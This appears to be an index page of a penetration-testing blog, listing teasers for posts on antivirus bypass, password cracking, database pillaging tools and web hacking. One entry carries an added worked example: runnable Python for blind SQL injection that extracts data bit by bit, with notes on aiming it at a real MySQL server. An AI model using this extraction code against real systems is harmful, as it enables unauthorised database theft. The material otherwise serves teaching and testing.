Bypassing AntiVirus With Process Injection
There is a new antivirus bypass tool which allows an attacker to inject shellcode into a process post-exploitation, enabling the attacker to pass a shell to a remote location. Generally I assume...
Open LockSport Donations
A slight divergence from the technical for a moment: everyone should go check out a cool new line of custom lock-picking tools that will be coming out shortly. Pre-order yours by providing a donation...
Blast From The Past
Recently on a test I ran into a Windows 2000 server running IIS 5 with the Internet Printing module enabled. I was quite surprised by this, but... a shell is a shell, right? Since this was on the job and I...
Setting up Pyrit on OS X with CUDA Support
A quick guide on getting Pyrit installed and working on OS X with GPU (CUDA) support. First you need to download and install the CUDA drivers and CUDA SDK from NVIDIA. Drivers...
WPA JTR/Pyrit/cowpatty uses and cracking interoperability
OpenDLP Pass-The-Hash
OpenDLP is a great time-saving tool when looking for sensitive data on Windows machines, but one pain with using it is that it requires a username and password for the target machine. Passwords are not...
The Database Pillager (tool release)
The Database Pillager (Usage Tutorial, Tool Release 0.1). I coded up a database pillaging tool for multiple database types which can be downloaded below. I would host...
DbPillage Release 0.3
Database Pillager Release 0.3 (a couple of new features and updates). Quick announcement on the Database Pillager tool: I have added new features and updated many things... Below is some info and an...
Immunity Canvas Code and CMDLine Walkthrough
This weekend was my first time playing around with Immunity Canvas. I noticed a lack of documentation for anything non-GUI based regarding the framework. Since I had such a hard time tracking down...
Web Hacking Video Series #1 Automating SQLi with Burp Extractor
Why: After speaking with many penetration testers I have realized that web application hacking is a mystery for many testers who typically perform network-based penetration testing but have no prior...
Web Hacking Video Series #2 Analysis of application behavior to bypass common...
Video Lesson Topics (running time 50+ minutes). This lesson covers the following topics:
Analysis of application behavior to bypass common implementation issues
Writing custom Python code to deal with...
Burp Intruder Time fields
This is an update to the last video blog: I had an update submission from Toxic after he watched Web Application video #2. Although module 4 was meant to teach how to code custom situations... Toxic noted...
DataBase Pillager 0.5 Release (Video) Targeted data searches
Updated Link + Features 9/27/2011 after this initial post (New Query-Cmd Line "-q" to drop you into a sql shell and data formatting on display) Example: python dbpillage.py -a 127.0.0.1 -d mysql -u...
Web Hacking Video Series #3 MySQL Part 1 (SQL Primer)
Video Lesson Topics:
Creating a SQL command shell in Python
Setting up a SQL lab/learning environment
Learning basic SQL queries
More advanced queries for pulling meaningful data
Interacting with the operating...
Web Hacking Video Series #4 MySQL Part 2 (Injection and Coding)
Video Lesson Topics:
Setting up your victim application, databases and lab
Attacking a simple injection with information_schema
Automating your injections with Python and BeautifulSoup
Dealing with...
Ganglia Monitoring System LFI
A while back, when doing a pentest, I ran into an interesting web application on a server that was acting as a gateway into a juicy environment *cough*PCI*cough*. The application was "Ganglia Monitoring...
Trendnet Cameras - I always feel like somebody's watching me.
Firstly, this post requires the following song to be playing: http://www.youtube.com/watch?v=wVfjwIyc-cU Now that we've got that out of the way... I have been seeing posts on sites with people having fun...
Bit Banging your Database
This post will be about stealing data from a database one bit at a time. Most of the time pulling data from a database a bit at a time would not be ideal or desirable, but in certain cases it will work...
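The technique the post describes, as an added worked example that is not the post's own code: a boolean oracle (a page that only reveals whether a query matched) is asked one yes/no question per bit of each character, so a 7-bit ASCII character costs exactly 7 requests instead of up to 127 linear guesses. The lab database, the `users` table, the `vulnerable_lookup` endpoint and the request counter are all constructed for the example; SQLite stands in for MySQL, with `unicode()` playing the role MySQL's `ASCII()` would (the `>>` and `&` operators behave the same in both).

```python
import sqlite3

# Constructed lab database standing in for the target (assumed, not from the post).
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE users (id INTEGER, name TEXT, secret TEXT)")
_conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cr3t!')")

QUERY_COUNT = 0  # number of requests sent to the oracle so far


def vulnerable_lookup(user_id: str) -> bool:
    """Simulated vulnerable endpoint (assumed): concatenates user input into
    the query and only reveals whether a row came back, i.e. a boolean oracle."""
    global QUERY_COUNT
    QUERY_COUNT += 1
    sql = f"SELECT id FROM users WHERE id = {user_id}"
    return _conn.execute(sql).fetchone() is not None


def bit_payload(column: str, table: str, pos: int, bit: int) -> str:
    """Injection fragment asking one yes/no question: is bit `bit` of the
    character at 1-based position `pos` of the first row's `column` set?"""
    return (f"1 AND ((unicode(substr((SELECT {column} FROM {table} LIMIT 1), "
            f"{pos}, 1)) >> {bit}) & 1) = 1")


def extract(column: str, table: str, max_len: int = 64) -> "tuple[str, int]":
    """Recover a string from the oracle one bit at a time. Returns the value
    and the number of requests it cost: 7 per character plus 7 to detect the end."""
    start = QUERY_COUNT
    chars = []
    for pos in range(1, max_len + 1):
        code = 0
        for bit in range(7):  # 7 bits cover ASCII; use 8 for arbitrary bytes
            if vulnerable_lookup(bit_payload(column, table, pos, bit)):
                code |= 1 << bit
        if code == 0:
            # substr() past the end yields '' and unicode('') is NULL, so every
            # bit test fails: that is the end-of-string signal.
            break
        chars.append(chr(code))
    return "".join(chars), QUERY_COUNT - start


if __name__ == "__main__":
    value, cost = extract("secret", "users")
    print(f"secret = {value!r} in {cost} requests")
```

Against a real MySQL target the same loop drives an HTTP client instead of `vulnerable_lookup`, and `bit_payload` swaps `unicode()` for `ASCII()`; the per-character cost and the NULL-based end-of-string check carry over unchanged.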
Wireless Scenarios Part 1: EAP-Radius JTR Hashcat, SSID MAC issues and more
Intro: I have been on a number of wireless engagements again lately, and much like the wireless blog I wrote over a year ago, I am trying various combinations of techniques and tools in conjunction to...
Social Engineering Pentest Professional (SEPP) Training Review
Intro: I recently returned from the new Social Engineering training provided by Social-Engineer.org in the beautiful city of Seattle, WA, a state known for sparkly vampires, music and coffee shop...